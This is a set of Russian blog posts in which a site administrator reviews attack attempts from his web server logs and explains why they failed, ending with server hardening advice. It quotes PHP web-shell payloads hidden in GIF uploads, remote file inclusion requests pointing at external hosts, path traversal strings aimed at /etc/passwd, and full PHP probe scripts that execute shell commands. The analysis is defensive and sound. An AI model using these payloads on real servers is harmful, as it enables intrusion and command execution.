заметки на полях » hack attempt

Hacking часть III

Дерябин Сергей — Sun, 06 Mar 2011 11:31:07 +0000

Застал опять в логах наинтереснейшую историю, длилась которая без малого 2 часа. Где искали дырку – стандартно в загрузке файлов. Здесь необходимо оговориться, что файлы можно загружать разные, не только картинки, а к примеру pdf, zip, doc, xls и т. д. Попытки пронумерую (для удобства отсылки к уже поясненному материалу) и прокомментирую. Кстати, нечто подобное уже было (см. здесь), но не совсем то. И так, приступим!

1., 2. Первая и вторая попытка в 22:23, файл cmd.gif и images.gif (зачем два непонятно) следующего содержания:

GIF89aV , ...
include($_GET["cmd"]); ?>

Такое в принципе возможно, т. к. в изображение можно добавлять комментарии, в которые и можно вставить PHP код. Функция getimagesize при этом будет возвращать реальный размер картинки без ошибок. Но такая лазейка возможна только если на сервере файлы .gif передаются на обработку PHP. Некоторые вкорячивают обработку и для html, что то тоже моветон.

3. В 22:26 было решено попробовать в файле 123.php.jpg втупую впихнуть код:

include($_GET['cmd']); ?>

Такое вариант тоже может прокатить, но только при условии не внимательного конфигурирования обработки php, как то вот так

location ~ \.php

Допускаю что такое может придти в голову, если используются несколько разрешений, к примеру .php, php3, php5. Но вообще ИМХО такое уже давно не встречается.

4. В 22:38 (дальнейшее штудирование «хакинга для чайников» подсказало) решено объединить п. 1 и п. 3 опять же в gif cmd2.gif для конструкции

GIF89aV ,
include("http://внешний-URL/shell.php"); ?>

Данная конструкция нежизнеспособна, т. к. нежизнеспособен способ из п. 1, а если бы даже обработка изображений отдавалась на php, то в php.ini есть параметр, который по умолчанию выключен и включать его нет совершенно никакой необходимости:

;Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = Off

5. Следующая попытка в 22:43 с файлом cmd3.php.txt и содержимым:

include("http://внешний-url/shell.php"); ?>

не очень интересна, т. к. была заранее обречена на провал.

6. А вот здесь, через две минуты, уже пошел работать ум пытливого хакера, в подсознании всплывали обрывки мыслей про другие скрипты, JavaScript`ы. А что, вдруг в разметку легким взмахом клавиш можно таки встроить PHP. И так, слабонервных отойти от экрана – файл cmd4.php.txt:

А мужики то и не знают…

7. 22:52 333.php.jpg

include($_GET["cmd"]); ?>

8. 23:01 777.gif

if(isset($_GET['shell'])){
include('http://внешний-url/shell.php');
}
?>

Здесь даже комментировать нечего, просто .gif попытка url_include – epic fail

9. Три попытки xxx.gif, xxx1.gif и xxx2.gif – завернутый в 3 конструкции eval( gzinflate( base64_decode( так называемый r57shell web shell. Только вот как он должен был заработать, если не заработал предыдущий вариант – непонятно

10. И опять за старое – 23:55 qwe.gif

include($_GET['cmd']); ?>

11. 00:10 qqq.gif

GIF89aV ,
$brd = fopen('file.php','w+'); $write = fwrite($brd, $file); ?>

Здесь совершенно не понятно что собиралось писаться в файл, т. к. в настройках стоит register_globals = Off и конструкция вида qqq.gif?file=%3C%3Fphp+include%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E не проканала бы

12. 00:12 zzz.gif

GIF89aV ,
echo "porn"; ?>

Из разряда дайте уже хоть что нибудь )))

13. Ну и последняя попытка 00:14 fff.gif

GIF89aV ,
include($_GET['cmd']); ?>

В качестве послесловия. Все мы люди и при написании кода забыть какую нить проверку при загрузке файла можно легко, поэтому надо отдельное внимание уделять настройкам сервера. Никаких register_globals = On, allow_url_include = On и т. д. Но самое главное, весь загружаемый контент не предназначен для выполнения, а только для отдачи. Поэтому обязательно, для всех директорий куда кладутся загружаемые файлы необходимо убирать обработку PHP, примерно вот так:

location ~ /upload/ { }

Hacking часть II

Дерябин Сергей — Tue, 29 Dec 2009 16:18:14 +0000

Продолжаю серию забавных вещей из логов:

client: 188.126.37.18, server: ***, request: "GET ////?_SERVER[DOCUMENT_ROOT]=http://photoworld.com.ua////zfxid1.txt??

Файлик zfxid1.txt следующего содержания:

zfxid.txt
/* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Дальше интересней

client: 89.38.128.140, server: ***, request: "GET /easy-git//?_SERVER[DOCUMENT_ROOT]=http://hiiraginao.com//test.gif??
client: 89.38.128.140, server: ***, request: "GET //?_SERVER[DOCUMENT_ROOT]=http://hiiraginao.com//test.gif??

Файлик test.gif следующего содержания:

SysTrojan

Wrong Place

if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;
?>

Ну и последний на сегодня

client: 89.185.231.103, server: ***, request: "GET //?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr/upload/bbs/conf2.txt????

и файлик conf2.txt следующего содержания:

$dir = @getcwd();
$ker = @php_uname();
echo "3"."1"."3"."3"."7"."
";
$OS = @PHP_OS;
echo "
OSTYPE:$OS
";
echo "
Kernel:$ker
";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."
";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}

echo "
3"."1"."2"."3"."4
";
?>

Hacking часть I

Дерябин Сергей — Mon, 28 Dec 2009 10:00:48 +0000

Обнаружил в логах довольно забавную картину по поиску слабых мест

client: 83.168.217.53, server: ***, request: "GET /plug.php?p=http://www.delicass.com/themes/delicasstheme/images/bienvenido.gif%00&a=resume&id=846 HTTP/1.0"

Ну и дальше вместо всех переменных пробуем подставлять:

/proc/self/environ%00
/../../../../../../../../../../proc/self/environ%00
/etc/passwd%00
../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../etc/passwd%00

Что самое интересное – откуда такая уверенность в относительности пути?! Именно так и никак иначе пытаться впихнуть.

А вот ходят по другому поводу

client: 203.237.238.234, server: ***, request: "GET /***.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1"

client: 203.237.238.234, server: ***, request: "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1"

Интересно, что за сканер такой, или руками?